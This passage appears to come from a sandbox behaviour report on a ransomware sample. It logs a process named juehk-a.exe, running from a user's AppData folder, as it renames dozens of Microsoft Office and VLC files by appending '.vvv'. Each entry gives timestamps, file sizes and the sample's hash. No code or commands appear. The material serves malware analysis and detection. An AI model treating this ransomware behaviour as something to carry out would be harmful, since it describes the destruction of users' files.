33390.          sequenceNumber: 2344
33391.          filesize: 9374
33392.          processinfo:
33393.            pid: 1648
33394.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
33395.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
33396.          old_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolBMPs\MessageHistoryIconImages.jpg
33397.          new_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolBMPs\MessageHistoryIconImages.jpg.vvv
33398.            ads:
33399.          fid (ads:): 562949953501083
33400.          ntstatus: 0x0
33401.          CreateOptions: 0x0
33402.        file:
33403.          timestamp: 102091
33404.          mode: rename
33405.          sequenceNumber: 2345
33406.          filesize: 16542
33407.          processinfo:
33408.            pid: 1648
33409.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
33410.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
33411.          old_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolBMPs\NotifierBackground.jpg
33412.          new_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolBMPs\NotifierBackground.jpg.vvv
33413.            ads:
33414.          fid (ads:): 562949953498791
33415.          ntstatus: 0x0
33416.          CreateOptions: 0x0
33417.        file:
33418.          timestamp: 102103
33419.          mode: rename
33420.          sequenceNumber: 2346
33421.          filesize: 16974
33422.          processinfo:
33423.            pid: 1648
33424.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
33425.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
33426.          old_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolBMPs\NotifierBackgroundRTL.jpg
33427.          new_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolBMPs\NotifierBackgroundRTL.jpg.vvv
33428.            ads:
33429.          fid (ads:): 562949953498792
33430.          ntstatus: 0x0
33431.          CreateOptions: 0x0
33432.        file:
33433.          timestamp: 102116
33434.          mode: rename
33435.          sequenceNumber: 2347
33436.          filesize: 1182
33437.          processinfo:
33438.            pid: 1648
33439.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
33440.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
33441.          old_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolBMPs\NotifierCloseButton.jpg
33442.          new_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolBMPs\NotifierCloseButton.jpg.vvv
33443.            ads:
33444.          fid (ads:): 562949953498793
33445.          ntstatus: 0x0
33446.          CreateOptions: 0x0
33447.        file:
33448.          timestamp: 102128
33449.          mode: rename
33450.          sequenceNumber: 2348
33451.          filesize: 1134
33452.          processinfo:
33453.            pid: 1648
33454.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
33455.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
33456.          old_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolBMPs\NotifierDisableDownArrow.jpg
33457.          new_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolBMPs\NotifierDisableDownArrow.jpg.vvv
33458.            ads:
33459.          fid (ads:): 562949953498794
33460.          ntstatus: 0x0
33461.          CreateOptions: 0x0
33462.        file:
33463.          timestamp: 102139
33464.          mode: rename
33465.          sequenceNumber: 2349
33466.          filesize: 1198
33467.          processinfo:
33468.            pid: 1648
33469.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
33470.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
33471.          old_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolBMPs\NotifierDisableUpArrow.jpg
33472.          new_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolBMPs\NotifierDisableUpArrow.jpg.vvv
33473.            ads:
33474.          fid (ads:): 562949953498795
33475.          ntstatus: 0x0
33476.          CreateOptions: 0x0
33477.        file:
33478.          timestamp: 102150
33479.          mode: rename
33480.          sequenceNumber: 2350
33481.          filesize: 1294
33482.          processinfo:
33483.            pid: 1648
33484.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
33485.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
33486.          old_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolBMPs\NotifierDownArrow.jpg
33487.          new_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolBMPs\NotifierDownArrow.jpg.vvv
33488.            ads:
33489.          fid (ads:): 562949953498796
33490.          ntstatus: 0x0
33491.          CreateOptions: 0x0
33492.        file:
33493.          timestamp: 102162
33494.          mode: rename
33495.          sequenceNumber: 2351
33496.          filesize: 1390
33497.          processinfo:
33498.            pid: 1648
33499.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
33500.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
33501.          old_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolBMPs\NotifierUpArrow.jpg
33502.          new_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolBMPs\NotifierUpArrow.jpg.vvv
33503.            ads:
33504.          fid (ads:): 562949953498797
33505.          ntstatus: 0x0
33506.          CreateOptions: 0x0
33507.        file:
33508.          timestamp: 102188
33509.          mode: rename
33510.          sequenceNumber: 2352
33511.          filesize: 4398
33512.          processinfo:
33513.            pid: 1648
33514.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
33515.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
33516.          old_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolBMPs\OutofSyncIconImages.jpg
33517.          new_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolBMPs\OutofSyncIconImages.jpg.vvv
33518.            ads:
33519.          fid (ads:): 562949953501592
33520.          ntstatus: 0x0
33521.          CreateOptions: 0x0
33522.        file:
33523.          timestamp: 102209
33524.          mode: rename
33525.          sequenceNumber: 2353
33526.          filesize: 3518
33527.          processinfo:
33528.            pid: 1648
33529.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
33530.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
33531.          old_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolBMPs\QuestionIcon.jpg
33532.          new_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolBMPs\QuestionIcon.jpg.vvv
33533.            ads:
33534.          fid (ads:): 562949953501599
33535.          ntstatus: 0x0
33536.          CreateOptions: 0x0
33537.        file:
33538.          timestamp: 102239
33539.          mode: rename
33540.          sequenceNumber: 2354
33541.          filesize: 26270
33542.          processinfo:
33543.            pid: 1648
33544.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
33545.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
33546.          old_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolBMPs\Shared16x16Images.jpg
33547.          new_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolBMPs\Shared16x16Images.jpg.vvv
33548.            ads:
33549.          fid (ads:): 1407374883633595
33550.          ntstatus: 0x0
33551.          CreateOptions: 0x0
33552.        file:
33553.          timestamp: 102269
33554.          mode: rename
33555.          sequenceNumber: 2355
33556.          filesize: 6926
33557.          processinfo:
33558.            pid: 1648
33559.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
33560.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
33561.          old_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolBMPs\Shared24x24Images.jpg
33562.          new_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolBMPs\Shared24x24Images.jpg.vvv
33563.            ads:
33564.          fid (ads:): 562949953501629
33565.          ntstatus: 0x0
33566.          CreateOptions: 0x0
33567.        file:
33568.          timestamp: 102311
33569.          mode: rename
33570.          sequenceNumber: 2356
33571.          filesize: 3774
33572.          processinfo:
33573.            pid: 1648
33574.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
33575.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
33576.          old_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolBMPs\STOPICON.JPG
33577.          new_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolBMPs\STOPICON.JPG.vvv
33578.            ads:
33579.          fid (ads:): 844424930212561
33580.          ntstatus: 0x0
33581.          CreateOptions: 0x0
33582.        file:
33583.          timestamp: 102323
33584.          mode: rename
33585.          sequenceNumber: 2357
33586.          filesize: 10158
33587.          processinfo:
33588.            pid: 1648
33589.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
33590.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
33591.          old_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolBMPs\TipsImage.jpg
33592.          new_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolBMPs\TipsImage.jpg.vvv
33593.            ads:
33594.          fid (ads:): 562949953499659
33595.          ntstatus: 0x0
33596.          CreateOptions: 0x0
33597.        file:
33598.          timestamp: 102335
33599.          mode: rename
33600.          sequenceNumber: 2358
33601.          filesize: 1534
33602.          processinfo:
33603.            pid: 1648
33604.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
33605.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
33606.          old_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolBMPs\VeriSignLogo.jpg
33607.          new_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolBMPs\VeriSignLogo.jpg.vvv
33608.            ads:
33609.          fid (ads:): 562949953499739
33610.          ntstatus: 0x0
33611.          CreateOptions: 0x0
33612.        file:
33613.          timestamp: 102400
33614.          mode: rename
33615.          sequenceNumber: 2359
33616.          filesize: 18030
33617.          processinfo:
33618.            pid: 1648
33619.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
33620.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
33621.          old_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolData\groove.net\CommonData\AlertImage_Auto.jpg
33622.          new_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolData\groove.net\CommonData\AlertImage_Auto.jpg.vvv
33623.            ads:
33624.          fid (ads:): 562949953499966
33625.          ntstatus: 0x0
33626.          CreateOptions: 0x0
33627.        file:
33628.          timestamp: 102430
33629.          mode: rename
33630.          sequenceNumber: 2360
33631.          filesize: 13566
33632.          processinfo:
33633.            pid: 1648
33634.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
33635.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
33636.          old_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolData\groove.net\CommonData\AlertImage_ContactHigh.jpg
33637.          new_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolData\groove.net\CommonData\AlertImage_ContactHigh.jpg.vvv
33638.            ads:
33639.          fid (ads:): 562949953499968
33640.          ntstatus: 0x0
33641.          CreateOptions: 0x0
33642.        file:
33643.          timestamp: 102459
33644.          mode: rename
33645.          sequenceNumber: 2361
33646.          filesize: 12574
33647.          processinfo:
33648.            pid: 1648
33649.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
33650.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
33651.          old_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolData\groove.net\CommonData\AlertImage_ContactLow.jpg
33652.          new_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolData\groove.net\CommonData\AlertImage_ContactLow.jpg.vvv
33653.            ads:
33654.          fid (ads:): 562949953499970
33655.          ntstatus: 0x0
33656.          CreateOptions: 0x0
33657.        file:
33658.          timestamp: 102477
33659.          mode: rename
33660.          sequenceNumber: 2362
33661.          filesize: 18862
33662.          processinfo:
33663.            pid: 1648
33664.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
33665.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
33666.          old_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolData\groove.net\CommonData\AlertImage_FileHigh.jpg
33667.          new_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolData\groove.net\CommonData\AlertImage_FileHigh.jpg.vvv
33668.            ads:
33669.          fid (ads:): 562949953499972
33670.          ntstatus: 0x0
33671.          CreateOptions: 0x0
33672.        file:
33673.          timestamp: 102493
33674.          mode: rename
33675.          sequenceNumber: 2363
33676.          filesize: 18558
33677.          processinfo:
33678.            pid: 1648
33679.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
33680.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
33681.          old_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolData\groove.net\CommonData\AlertImage_FileOff.jpg
33682.          new_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolData\groove.net\CommonData\AlertImage_FileOff.jpg.vvv
33683.            ads:
33684.          fid (ads:): 562949953499974
33685.          ntstatus: 0x0
33686.          CreateOptions: 0x0
33687.        file:
33688.          timestamp: 102516
33689.          mode: rename
33690.          sequenceNumber: 2364
33691.          filesize: 5486
33692.          processinfo:
33693.            pid: 1648
33694.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
33695.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
33696.          old_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolData\groove.net\CommonData\AlertImage_High.jpg
33697.          new_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolData\groove.net\CommonData\AlertImage_High.jpg.vvv
33698.            ads:
33699.          fid (ads:): 562949953499976
33700.          ntstatus: 0x0
33701.          CreateOptions: 0x0
33702.        file:
33703.          timestamp: 102532
33704.          mode: rename
33705.          sequenceNumber: 2365
33706.          filesize: 17278
33707.          processinfo:
33708.            pid: 1648
33709.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
33710.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
33711.          old_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolData\groove.net\CommonData\AlertImage_Medium.jpg
33712.          new_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolData\groove.net\CommonData\AlertImage_Medium.jpg.vvv
33713.            ads:
33714.          fid (ads:): 562949953499978
33715.          ntstatus: 0x0
33716.          CreateOptions: 0x0
33717.        file:
33718.          timestamp: 102547
33719.          mode: rename
33720.          sequenceNumber: 2366
33721.          filesize: 16414
33722.          processinfo:
33723.            pid: 1648
33724.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
33725.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
33726.          old_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolData\groove.net\CommonData\AlertImage_Off.jpg
33727.          new_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolData\groove.net\CommonData\AlertImage_Off.jpg.vvv
33728.            ads:
33729.          fid (ads:): 562949953499980
33730.          ntstatus: 0x0
33731.          CreateOptions: 0x0
33732.        file:
33733.          timestamp: 102573
33734.          mode: rename
33735.          sequenceNumber: 2367
33736.          filesize: 9214
33737.          processinfo:
33738.            pid: 1648
33739.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
33740.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
33741.          old_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolData\groove.net\CommonData\CommsIncomingImage.jpg
33742.          new_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolData\groove.net\CommonData\CommsIncomingImage.jpg.vvv
33743.            ads:
33744.          fid (ads:): 562949953500695
33745.          ntstatus: 0x0
33746.          CreateOptions: 0x0
33747.        file:
33748.          timestamp: 102597
33749.          mode: rename
33750.          sequenceNumber: 2368
33751.          filesize: 8078
33752.          processinfo:
33753.            pid: 1648
33754.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
33755.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
33756.          old_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolData\groove.net\CommonData\CommsIncomingImageSmall.jpg
33757.          new_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolData\groove.net\CommonData\CommsIncomingImageSmall.jpg.vvv
33758.            ads:
33759.          fid (ads:): 562949953500698
33760.          ntstatus: 0x0
33761.          CreateOptions: 0x0
33762.        file:
33763.          timestamp: 102616
33764.          mode: rename
33765.          sequenceNumber: 2369
33766.          filesize: 9326
33767.          processinfo:
33768.            pid: 1648
33769.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
33770.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
33771.          old_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolData\groove.net\CommonData\CommsOutgoingImage.jpg
33772.          new_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolData\groove.net\CommonData\CommsOutgoingImage.jpg.vvv
33773.            ads:
33774.          fid (ads:): 844424930211355
33775.          ntstatus: 0x0
33776.          CreateOptions: 0x0
33777.        file:
33778.          timestamp: 102629
33779.          mode: rename
33780.          sequenceNumber: 2370
33781.          filesize: 8062
33782.          processinfo:
33783.            pid: 1648
33784.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
33785.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
33786.          old_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolData\groove.net\CommonData\CommsOutgoingImageSmall.jpg
33787.          new_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolData\groove.net\CommonData\CommsOutgoingImageSmall.jpg.vvv
33788.            ads:
33789.          fid (ads:): 1125899906922014
33790.          ntstatus: 0x0
33791.          CreateOptions: 0x0
33792.        file:
33793.          timestamp: 102642
33794.          mode: rename
33795.          sequenceNumber: 2371
33796.          filesize: 10558
33797.          processinfo:
33798.            pid: 1648
33799.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
33800.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
33801.          old_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolData\groove.net\CommonData\MessageBoxIconImages.jpg
33802.          new_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolData\groove.net\CommonData\MessageBoxIconImages.jpg.vvv
33803.            ads:
33804.          fid (ads:): 562949953501080
33805.          ntstatus: 0x0
33806.          CreateOptions: 0x0
33807.        file:
33808.          timestamp: 102679
33809.          mode: rename
33810.          sequenceNumber: 2372
33811.          filesize: 8590
33812.          processinfo:
33813.            pid: 1648
33814.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
33815.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
33816.          old_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolData\groove.net\CommonData\UnreadIcon.jpg
33817.          new_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolData\groove.net\CommonData\UnreadIcon.jpg.vvv
33818.            ads:
33819.          fid (ads:): 562949953501962
33820.          ntstatus: 0x0
33821.          CreateOptions: 0x0
33822.        file:
33823.          timestamp: 102692
33824.          mode: rename
33825.          sequenceNumber: 2373
33826.          filesize: 8606
33827.          processinfo:
33828.            pid: 1648
33829.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
33830.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
33831.          old_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolData\groove.net\CommonData\UnreadIconImages.jpg
33832.          new_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolData\groove.net\CommonData\UnreadIconImages.jpg.vvv
33833.            ads:
33834.          fid (ads:): 562949953501963
33835.          ntstatus: 0x0
33836.          CreateOptions: 0x0
33837.        file:
33838.          timestamp: 102708
33839.          mode: rename
33840.          sequenceNumber: 2374
33841.          filesize: 4030
33842.          processinfo:
33843.            pid: 1648
33844.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
33845.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
33846.          old_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolData\groove.net\Computers\computericon.jpg
33847.          new_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolData\groove.net\Computers\computericon.jpg.vvv
33848.            ads:
33849.          fid (ads:): 1125899906922019
33850.          ntstatus: 0x0
33851.          CreateOptions: 0x0
33852.        file:
33853.          timestamp: 102869
33854.          mode: rename
33855.          sequenceNumber: 2375
33856.          filesize: 1042446
33857.          processinfo:
33858.            pid: 1648
33859.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
33860.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
33861.          old_name: C:\Program Files\Microsoft Office\Office15\MEDIA\DefaultHold.wma
33862.          new_name: C:\Program Files\Microsoft Office\Office15\MEDIA\DefaultHold.wma.vvv
33863.            ads:
33864.          fid (ads:): 562949953498597
33865.          ntstatus: 0x0
33866.          CreateOptions: 0x0
33867.        file:
33868.          timestamp: 102910
33869.          mode: rename
33870.          sequenceNumber: 2376
33871.          filesize: 85598
33872.          processinfo:
33873.            pid: 1648
33874.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
33875.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
33876.          old_name: C:\Program Files\Microsoft Office\Office15\Microsoft.Lync.Model.zip
33877.          new_name: C:\Program Files\Microsoft Office\Office15\Microsoft.Lync.Model.zip.vvv
33878.            ads:
33879.          fid (ads:): 562949953498554
33880.          ntstatus: 0x0
33881.          CreateOptions: 0x0
33882.        file:
33883.          timestamp: 102923
33884.          mode: rename
33885.          sequenceNumber: 2377
33886.          filesize: 29230
33887.          processinfo:
33888.            pid: 1648
33889.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
33890.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
33891.          old_name: C:\Program Files\Microsoft Office\Office15\Microsoft.Lync.Utilities.Controls.zip
33892.          new_name: C:\Program Files\Microsoft Office\Office15\Microsoft.Lync.Utilities.Controls.zip.vvv
33893.            ads:
33894.          fid (ads:): 562949953498555
33895.          ntstatus: 0x0
33896.          CreateOptions: 0x0
33897.        file:
33898.          timestamp: 102948
33899.          mode: rename
33900.          sequenceNumber: 2378
33901.          filesize: 70958
33902.          processinfo:
33903.            pid: 1648
33904.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
33905.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
33906.          old_name: C:\Program Files\Microsoft Office\Office15\Microsoft.Lync.Utilities.zip
33907.          new_name: C:\Program Files\Microsoft Office\Office15\Microsoft.Lync.Utilities.zip.vvv
33908.            ads:
33909.          fid (ads:): 562949953498556
33910.          ntstatus: 0x0
33911.          CreateOptions: 0x0
33912.        file:
33913.          timestamp: 103092
33914.          mode: rename
33915.          sequenceNumber: 2379
33916.          filesize: 82414
33917.          processinfo:
33918.            pid: 1648
33919.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
33920.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
33921.          old_name: C:\Program Files\Microsoft Office\Office15\Ocomprivate.zip
33922.          new_name: C:\Program Files\Microsoft Office\Office15\Ocomprivate.zip.vvv
33923.            ads:
33924.          fid (ads:): 562949953498567
33925.          ntstatus: 0x0
33926.          CreateOptions: 0x0
33927.        file:
33928.          timestamp: 103433
33929.          mode: rename
33930.          sequenceNumber: 2380
33931.          filesize: 119214
33932.          processinfo:
33933.            pid: 1648
33934.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
33935.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
33936.          old_name: C:\Program Files\Microsoft Office\Office15\SAMPLES\SOLVSAMP.XLS
33937.          new_name: C:\Program Files\Microsoft Office\Office15\SAMPLES\SOLVSAMP.XLS.vvv
33938.            ads:
33939.          fid (ads:): 562949953496322
33940.          ntstatus: 0x0
33941.          CreateOptions: 0x0
33942.        file:
33943.          timestamp: 103469
33944.          mode: rename
33945.          sequenceNumber: 2381
33946.          filesize: 11950
33947.          processinfo:
33948.            pid: 1648
33949.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
33950.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
33951.          old_name: C:\Program Files\Microsoft Office\Office15\System.Windows.Controls.Theming.Toolkit.zip
33952.          new_name: C:\Program Files\Microsoft Office\Office15\System.Windows.Controls.Theming.Toolkit.zip.vvv
33953.            ads:
33954.          fid (ads:): 562949953498637
33955.          ntstatus: 0x0
33956.          CreateOptions: 0x0
33957.        file:
33958.          timestamp: 103509
33959.          mode: rename
33960.          sequenceNumber: 2382
33961.          filesize: 3374
33962.          processinfo:
33963.            pid: 1648
33964.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
33965.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
33966.          old_name: C:\Program Files\Microsoft Office\Stationery\1033\NOTEBOOK.JPG
33967.          new_name: C:\Program Files\Microsoft Office\Stationery\1033\NOTEBOOK.JPG.vvv
33968.            ads:
33969.          fid (ads:): 562949953496858
33970.          ntstatus: 0x0
33971.          CreateOptions: 0x0
33972.        file:
33973.          timestamp: 103694
33974.          mode: rename
33975.          sequenceNumber: 2383
33976.          filesize: 4398
33977.          processinfo:
33978.            pid: 1648
33979.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
33980.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
33981.          old_name: C:\Program Files\Microsoft Office\Stationery\1033\PINELUMB.JPG
33982.          new_name: C:\Program Files\Microsoft Office\Stationery\1033\PINELUMB.JPG.vvv
33983.            ads:
33984.          fid (ads:): 562949953496897
33985.          ntstatus: 0x0
33986.          CreateOptions: 0x0
33987.        file:
33988.          timestamp: 103722
33989.          mode: rename
33990.          sequenceNumber: 2384
33991.          filesize: 6702
33992.          processinfo:
33993.            pid: 1648
33994.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
33995.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
33996.          old_name: C:\Program Files\Microsoft Office\Stationery\1033\SEAMARBL.JPG
33997.          new_name: C:\Program Files\Microsoft Office\Stationery\1033\SEAMARBL.JPG.vvv
33998.            ads:
33999.          fid (ads:): 562949953496938
34000.          ntstatus: 0x0
34001.          CreateOptions: 0x0
34002.        file:
34003.          timestamp: 103992
34004.          mode: rename
34005.          sequenceNumber: 2385
34006.          filesize: 16750
34007.          processinfo:
34008.            pid: 1648
34009.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
34010.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
34011.          old_name: C:\Program Files\VideoLAN\VLC\AUTHORS.txt
34012.          new_name: C:\Program Files\VideoLAN\VLC\AUTHORS.txt.vvv
34013.            ads:
34014.          fid (ads:): 1125899906934893
34015.          ntstatus: 0x0
34016.          CreateOptions: 0x0
34017.        file:
34018.          timestamp: 104019
34019.          mode: rename
34020.          sequenceNumber: 2386
34021.          filesize: 18846
34022.          processinfo:
34023.            pid: 1648
34024.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
34025.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
34026.          old_name: C:\Program Files\VideoLAN\VLC\COPYING.txt
34027.          new_name: C:\Program Files\VideoLAN\VLC\COPYING.txt.vvv
34028.            ads:
34029.          fid (ads:): 1407374883645550
34030.          ntstatus: 0x0
34031.          CreateOptions: 0x0
34032.        file:
34033.          timestamp: 104538
34034.          mode: rename
34035.          sequenceNumber: 2387
34036.          filesize: 4222
34037.          processinfo:
34038.            pid: 1648
34039.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
34040.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
34041.          old_name: C:\Program Files\VideoLAN\VLC\lua\http\css\main.css
34042.          new_name: C:\Program Files\VideoLAN\VLC\lua\http\css\main.css.vvv
34043.            ads:
34044.          fid (ads:): 562949953517667
34045.          ntstatus: 0x0
34046.          CreateOptions: 0x0
34047.        file:
34048.          timestamp: 104549
34049.          mode: rename
34050.          sequenceNumber: 2388
34051.          filesize: 3150
34052.          processinfo:
34053.            pid: 1648
34054.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
34055.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
34056.          old_name: C:\Program Files\VideoLAN\VLC\lua\http\css\mobile.css
34057.          new_name: C:\Program Files\VideoLAN\VLC\lua\http\css\mobile.css.vvv
34058.            ads:
34059.          fid (ads:): 562949953517668
34060.          ntstatus: 0x0
34061.          CreateOptions: 0x0
34062.        file:
34063.          timestamp: 104565
34064.          mode: rename
34065.          sequenceNumber: 2389
34066.          filesize: 622
34067.          processinfo:
34068.            pid: 1648
34069.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
34070.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
34071.          old_name: C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_18_b81900_40x40.png
34072.          new_name: C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_18_b81900_40x40.png.vvv
34073.            ads:
34074.          fid (ads:): 562949953517672
34075.          ntstatus: 0x0
34076.          CreateOptions: 0x0
34077.        file:
34078.          timestamp: 104578
34079.          mode: rename
34080.          sequenceNumber: 2390
34081.          filesize: 622
34082.          processinfo:
34083.            pid: 1648
34084.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
34085.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
34086.          old_name: C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_20_666666_40x40.png
34087.          new_name: C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_20_666666_40x40.png.vvv
34088.            ads:
